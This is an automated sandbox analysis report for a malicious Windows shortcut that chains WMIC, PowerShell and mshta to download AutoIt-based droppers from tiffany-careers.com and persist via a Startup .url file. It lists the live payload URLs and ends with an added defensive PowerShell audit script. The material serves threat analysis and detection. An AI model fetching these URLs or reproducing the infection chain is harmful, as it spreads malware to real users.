Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC88BF4 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,wcscat,wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,wcscpy,15_2_00007FF7ADC88BF4
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC62BCF GetUserNameW,15_2_00007FF7ADC62BCF
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC42650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,15_2_00007FF7ADC42650
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC21D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,15_2_00007FF7ADC21D80
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: XKIZdXAs.exe, 0000000F.00000003.1659899214.000001B3D6459000.00000004.00000020.00020000.00000000.sdmp, XKIZdXAs.exe, 0000000F.00000003.1660142096.000001B3D645E000.00000004.00000020.00020000.00000000.sdmp, XKIZdXAs.exe, 0000000F.00000003.1660360987.000001B3D6461000.00000004.00000020.00020000.00000000.sdmp, XKIZdXAs.exe, 0000000F.00000002.1665360380.000001B3D6463000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2022240307.000001E2B45A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1740822897.000001E29C231000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Users\Public\Guard.exe
Source: Guard.exe, 00000017.00000002.2671312302.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \Device\HarddiskVolume3\Users\Public\Guard.exe
Source: Guard.exe, 00000017.00000002.2671253844.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Windows\system32\C:\Users\Public\Guard.exe"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 C:\Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1740822897.000001E29C231000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Public\Guard.exe
Source: powershell.exe, 00000015.00000002.2016072864.000001E2B4510000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2019083440.000001E2B4536000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2016072864.000001E2B451C000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1736280237.0000000004461000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1728057267.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1736780329.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1732003025.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1742564683.0000000004461000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1737575616.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1724002699.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1724243994.0000000000B00000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Guard.exe
Source: Guard.exe, 00000017.00000002.2670698640.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: pC:\Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.2022240307.000001E2B45A3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2000613161.000001E2B42A1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29C037000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2022240307.000001E2B458D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2000613161.000001E2B42AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29C231000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, Guard.exe, 00000017.00000002.2669554964.00000000009BF000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1740822897.000001E29C231000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: \Users\Public\Guard.exe
Source: SwiftWrite.pif | Binary or memory string: WIN_81
Source: SwiftWrite.pif | Binary or memory string: WIN_XP
Source: SwiftWrite.pif | Binary or memory string: WIN_XPe
Source: SwiftWrite.pif | Binary or memory string: WIN_VISTA
Source: XKIZdXAs.exe, 0000000F.00000000.1591030460.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pif | Binary or memory string: WIN_7
Source: SwiftWrite.pif | Binary or memory string: WIN_8
Source: SwiftWrite.pif.23.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC94074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,15_2_00007FF7ADC94074
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC93940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,15_2_00007FF7ADC93940
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BC696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,23_2_00BC696E
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BC6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,23_2_00BC6E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0086696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,27_2_0086696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00866E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,27_2_00866E32
ATT&CK matrix, one line per tactic. A number before a technique is the report's count badge for that technique (the digits were run together by extraction); techniques without a number were not triggered by this sample.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses
Resource Development: 1 Scripting, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure
Initial Access: 2 Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
Execution: 21 Windows Management Instrumentation, 2 Native API, 2 Command and Scripting Interpreter, 3 PowerShell, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell
Persistence: 1 Scripting, 1 DLL Side-Loading, 2 Valid Accounts, 2 Registry Run Keys / Startup Folder, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Privilege Escalation: 1 Exploitation for Privilege Escalation, 1 DLL Side-Loading, 2 Valid Accounts, 21 Access Token Manipulation, 12 Process Injection, 2 Registry Run Keys / Startup Folder, Startup Items, Scheduled Task/Job, At, Cron
Defense Evasion: 1 Disable or Modify Tools, 1 Deobfuscate/Decode Files or Information, 2 Obfuscated Files or Information, 1 Timestomp, 1 DLL Side-Loading, 231 Masquerading, 2 Valid Accounts, 31 Virtualization/Sandbox Evasion, 21 Access Token Manipulation, 12 Process Injection
Credential Access: 21 Input Capture, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
Discovery: 2 System Time Discovery, 1 Account Discovery, 2 File and Directory Discovery, 38 System Information Discovery, 151 Security Software Discovery, 31 Virtualization/Sandbox Evasion, 13 Process Discovery, 11 Application Window Discovery, 1 System Owner/User Discovery, Network Service Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot
Collection: 1 Archive Collected Data, 1 Email Collection, 21 Input Capture, 3 Clipboard Data, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
Command and Control: 2 Ingress Tool Transfer, 11 Encrypted Channel, 2 Non-Application Layer Protocol, 13 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement
Behavior graph (ID 1581249, sample n5Szx8qsFB.lnk, start date 27/12/2024, architecture WINDOWS, score 100), rendered here as a process tree. Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Windows shortcut file (LNK) starts blacklisted processes; 16 other signatures. Contacted: x1.i.lencr.org; tiffany-careers.com (147.45.49.155 port 443, local ports 49705 and 49709, FREE-NET-AS / FREEnet EU, Russian Federation); 2 other IPs or domains.

n5Szx8qsFB.lnk
  WMIC.exe  [Contains functionality to create processes via WMI; Creates processes via WMI]
    powershell.exe  [Windows shortcut file (LNK) starts blacklisted processes; Drops PE files to the user root directory; Powershell drops PE file]
      powershell.exe  [Windows shortcut file (LNK) starts blacklisted processes]
        mshta.exe  connects to tiffany-careers.com 147.45.49.155:443; drops C:\Users\user\AppData\Local\...\ghep2412_2[1] (PE32)  [Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found]
          powershell.exe  drops C:\Users\user\AppData\Roaming\XKIZdXAs.exe (PE32+)  [Binary is likely a compiled AutoIt script file]
            XKIZdXAs.exe  drops C:\Users\Public\PublicProfile.ps1 (ASCII)  [Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for dropped file; Suspicious powershell command line found; 2 other signatures]
              powershell.exe  drops C:\Users\Public\Secure.au3 (Unicode)
                Guard.exe  drops C:\Users\user\AppData\...\SwiftWrite.pif (PE32) and C:\Users\user\AppData\Local\...\SwiftWrite.js (ASCII)  [Windows shortcut file (LNK) starts blacklisted processes; Drops PE files with a suspicious file extension]
                  cmd.exe  drops C:\Users\user\AppData\...\SwiftWrite.url (MS)
                    conhost.exe
                conhost.exe
              powershell.exe  drops C:\Users\Public\Guard.exe (PE32)
                conhost.exe
            Acrobat.exe
              AcroCEF.exe
                AcroCEF.exe
            conhost.exe
      conhost.exe
    conhost.exe
  wscript.exe  [Windows Scripting host queries suspicious COM object (likely to drop second stage)]
    SwiftWrite.pif
  svchost.exe  connects to 127.0.0.1
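The persistence step at the bottom of the tree is a plain `.url` file in the user's Startup folder whose `URL=` value is a local `.js` path, written by `cmd.exe` via `echo` (see the Guard.exe command line earlier on this page). The following is an added example, not code from the report or the sample, that audits both Startup folders for that pattern and flags `.url` shortcuts pointing at local script or binary files, especially under user-writable paths. Function names and the flag heuristics are ours; the sample `.url` content is constructed to match what the report shows the sample writing.

```powershell
# Added example (not code from the report or the sample): audit the Startup
# folders for .url shortcuts whose URL= points at a local script or binary,
# which is how the sample persists (swiftwrite.url -> swiftwrite.js).
# Function names and the flag heuristics below are ours.

function Test-UrlShortcut {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string[]]$Content                       # omit to read the file at $Path
    )
    if (-not $Content) { $Content = Get-Content -LiteralPath $Path }

    $target = $null
    foreach ($line in $Content) {
        # .url is an INI file: match the URL key case-insensitively and strip the
        # quotes that the sample's 'echo url="..."' leaves around the value.
        if ($line -match '^\s*URL\s*=\s*(.*?)\s*$') { $target = $Matches[1].Trim('"'); break }
    }

    $flags = @()
    if ($target -match '^(file:///|[A-Za-z]:\\|\\\\)') { $flags += 'local-target' }   # not a web URL
    $ext = [System.IO.Path]::GetExtension(($target -replace '^file:///', '')).ToLower()
    if ($ext -in '.js','.jse','.vbs','.vbe','.wsf','.hta','.ps1','.bat','.cmd','.pif','.scr','.exe','.dll','.lnk') {
        $flags += "executable-extension($ext)"
    }
    if ($target -match '\\(AppData|Users\\Public|Temp|ProgramData)\\') { $flags += 'user-writable-path' }

    [pscustomobject]@{
        Path       = $Path
        Target     = $target
        Flags      = $flags -join ', '
        Suspicious = ($flags.Count -gt 0)
    }
}

function Get-StartupUrlShortcut {
    # Both the per-user and the all-users Startup folders.
    $dirs = @([Environment]::GetFolderPath('Startup'), [Environment]::GetFolderPath('CommonStartup'))
    foreach ($dir in $dirs) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        Get-ChildItem -LiteralPath $dir -Filter *.url -File -ErrorAction SilentlyContinue |
            ForEach-Object { Test-UrlShortcut -Path $_.FullName }
    }
}

# Constructed input reproducing what the sample's cmd.exe wrote (trailing spaces included,
# because 'echo ... >' emits them).
$constructed = @(
    '[internetshortcut] ',
    'url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" '
)
Test-UrlShortcut -Path 'swiftwrite.url (constructed)' -Content $constructed | Format-List
# Flags: local-target, executable-extension(.js), user-writable-path   Suspicious: True

# Live audit of this host:
Get-StartupUrlShortcut | Where-Object Suspicious | Format-Table -AutoSize
```

A legitimate `.url` in Startup normally carries an `http`/`https` target; a local path, and above all a script extension under AppData or Users\Public, is the signal here. The same check is worth running against `.lnk` files in the same folders, which this example leaves out.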
Source | Detection | Scanner | Label
n5Szx8qsFB.lnk | 30% | Virustotal |
n5Szx8qsFB.lnk | 21% | ReversingLabs | Win32.Trojan.Pantera

Source | Detection | Scanner | Label
C:\Users\Public\Guard.exe | 8% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1] | 37% | ReversingLabs | Win32.Dropper.Lumma
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | 8% | ReversingLabs |
C:\Users\user\AppData\Roaming\XKIZdXAs.exe | 35% | ReversingLabs | Win64.Downloader.Generic
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://tiffany-careers.com/XKIZdXAs | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2... | 0% | Avira URL Cloud | safe
https://tiffany-careers.com | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2H | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/Project_Information.pdf | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/XKIZdXAs.exe | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ZxVMIVZIX.txt | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/XKIZ | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2kk | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/XKIZd | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2lvEb. | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/X | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2C: | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/XKIZdXA | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/XK | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/XKIZdX | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2...b | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2LMEMP | 0% | Avira URL Cloud | safe
https://tiffany-careers.c | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ALGglt | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/XKIZdXAs.e | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/XKIZdXAs.ex | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2p | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2t | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2https://tiffany-careers.com/ghep2412_2 | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2...C | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2s | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2nN | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/XKI | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/XKIZdXAs. | 0% | Avira URL Cloud | safe
https://tiffany-careers.co | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_24d | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2Qa | 0% | Avira URL Cloud | safe
http://tiffany-careers.com | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2$global:? | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2 | 0% | Avira URL Cloud | safe
https://tiffany-careers.com/ghep2412_2TTC: | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
tiffany-careers.com | 147.45.49.155 | true | false | | high
x1.i.lencr.org | unknown | unknown | false | | high
nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://tiffany-careers.com/XKIZdXAs.exe | true | Avira URL Cloud: safe | unknown
https://tiffany-careers.com/Project_Information.pdf | true | Avira URL Cloud: safe | unknown
https://tiffany-careers.com/ZxVMIVZIX.txt | true | Avira URL Cloud: safe | unknown
https://tiffany-careers.com/ALGglt | true | Avira URL Cloud: safe | unknown
https://tiffany-careers.com/ghep2412_2 | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
147.45.49.155 | tiffany-careers.com | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
                                                    IP
                                                    127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581249
Start date and time: 2024-12-27 09:04:15 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 31
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: n5Szx8qsFB.lnk (renamed because the original name is a hash value)
Original Sample Name: a1cfce4d0ce44d183b7c9c5bbce9d8f5.lnk
Detection: MAL
Classification: mal100.expl.evad.winLNK@43/71@5/2
EGA Information:
• Successful, ratio: 42.9%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 56
• Number of non-executed functions: 242
Cookbook Comments:
• Found application associated with file extension: .lnk
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.109, 23.218.208.137, 162.159.61.3, 172.64.41.3, 199.232.214.172, 50.16.47.176, 54.224.241.105, 34.237.241.83, 18.213.11.84, 23.195.39.65, 184.30.20.134, 23.32.238.130, 2.19.198.75, 23.32.238.163, 52.149.20.212
• Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e4578.dscb.akamaiedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
• Execution Graph export aborted for target mshta.exe, PID 8084 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 7508 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8004 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8376 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
